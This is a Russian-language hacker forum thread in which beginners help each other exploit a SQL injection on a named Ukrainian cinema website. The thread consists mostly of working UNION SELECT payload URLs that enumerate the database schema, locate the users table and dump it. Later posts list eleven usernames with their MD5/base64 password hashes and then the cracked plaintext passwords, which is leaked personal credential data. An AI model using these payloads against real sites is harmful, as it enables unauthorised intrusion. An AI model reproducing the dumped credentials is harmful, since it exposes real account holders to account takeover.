Прет Всем!)

Ребят я зараниее предупреждаю что я новичок в этом..так что не грубить, а понимать)


Так вот. Вчера один чел(тоже новичок) дал мне одну ссылку на скуль иньекцию...
вот
http://www.kino-ukraina.com.ua/news/?nid=-1'+union+select+1,2,3,database(),5,user()/*

ну мы начели капать что как ..хотели найти пассворд и т.д. .... так искали где то час или больше ) без результатно..потом я предложил такой способ http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,COLUMN_NAME,5,6+FROM+INFORMA TION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT +1,1/*

поскольно у него выделенка:)) он быстрее подобрал)..
оказалось LIMIT 3,1 типо 3-ая колонка - pwd ..
но при вводе http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,pwd,5,6+From+users/*

выводится "getLink fatal error: Table 'kinosite.users' doesn't exist"

отсюда я понял что надо найти какую то замену типо ***.users в местно киносайт ( правдно я этот момент не до конца поянл почиму так :) )..ну начал подбирать таблицы своими руками :) в стиле http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,TABLE_NAME,5,6+FROM+INFORMAT ION_SCHEMA.TABLES+LIMIT+1,1/*

дошел до 39...и нашел там Users но по неизвестной мне причине при http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,pwd,5,6+From+Users.users/* выводится ошибка getLink fatal error: SELECT command denied to user 'site'@'localhost' for table 'users'

плз скажите в чем моя ошибка?( :(

На чтение users прав не хватает

не у теб одного такие проблемы пользуйся прогой для подбора таблиц Вот ссылка не нее и ман тоже там
https://forum.antichat.ru/thread40545-SQL+TOOLS.html

На чтение users прав не хватает

а что тада делать то?

выведи название таблици

http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,concat_ws(0x3A,table_schema, TABLE_NAME),5,6+FROM+INFORMATION_SCHEMA.TABLES+LIM IT+39,1/*

*дополнение

http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,pwd,5,6+From+cin.Users/*

Admin : 1B2M2Y8AsgTpgAmY7PhCfg==
test : tZxnvxlqR1gZHkL3ZnDOug==
tanyak : qbe6cHg7YX6ZmNxN2C6zxQ==
valia : +4dYKCX50oqNQsXl5eiyPQ==
oksana : Hk02F31xu7NVjkOvlXfXDg==
zhenya : 1ooYJ1RVrj6qLCke67RubQ==
oksanad:tZxnvxlqR1gZHkL3ZnDOug==
tanya:xN6M7WIUNFYU0z+wsWqKzQ==
valya:KsZ12HUk/jfWDkhq9WV0Tg==
luda:+AvwVScVeowqe7Y7IvSaqg==
angela:3nOZiAJoBUi5FvGUf/utdg==

http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,count(*),5,6+From+cin.Users/*

Вообщем их там 19 человек

спс попробую

только не поймуcin:Users во такой вывод а что такое "cin" ? что такое вообще table_schema ?

ооо прикольно СПС огромное!

Можно проще без лимита
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,table_schema,5,6+FROM+INFORM ATION_SCHEMA.TABLES+WHERE+TABLE_NAME='users'/*
cin.users
о такой вывод а что такое "cin" ? что такое вообще table_schema ?
Это имя базы данных(schema), в СУБД может быть несколько разных БД с разными таблицами.
Читай здесь https://forum.antichat.ru/showpost.php?p=442627&postcount=26

дак я выше написал уже как вывести пользователей да ипользователей вывел =))) их там 19 штук))

слушайте)) а это пассы откдуа?(всмысле а где сама адмика) ?) (сори за тупые вопросы)

а че за вид пасса ?? 1B2M2Y8AsgTpgAmY7PhCfg это не мд5

Ты 2 "равно" забыл) Вообще очень похоже на Base64 (как раз из-за этих двух "="), но у меня почему-то конвертяца они в какой-то хлам =\

а че за вид пасса ?? 1B2M2Y8AsgTpgAmY7PhCfg это не мд5


MD5(base64)

Прогнал получилось:

Admin:1B2M2Y8AsgTpgAmY7PhCfg==::<No password>:
test:tZxnvxlqR1gZHkL3ZnDOug==::1111:
tanyak:qbe6cHg7YX6ZmNxN2C6zxQ==::1000:
valia:+4dYKCX50oqNQsXl5eiyPQ==::1982:
oksana:Hk02F31xu7NVjkOvlXfXDg==::1983:
zhenya:1ooYJ1RVrj6qLCke67RubQ==::1987:
oksanad:tZxnvxlqR1gZHkL3ZnDOug==::1111:
tanya:xN6M7WIUNFYU0z+wsWqKzQ==::1972:
valya:KsZ12HUk/jfWDkhq9WV0Tg==::v1978:
luda:+AvwVScVeowqe7Y7IvSaqg==::1980:
angela:3nOZiAJoBUi5FvGUf/utdg==::1971:

Понятно всем огромное СПС!!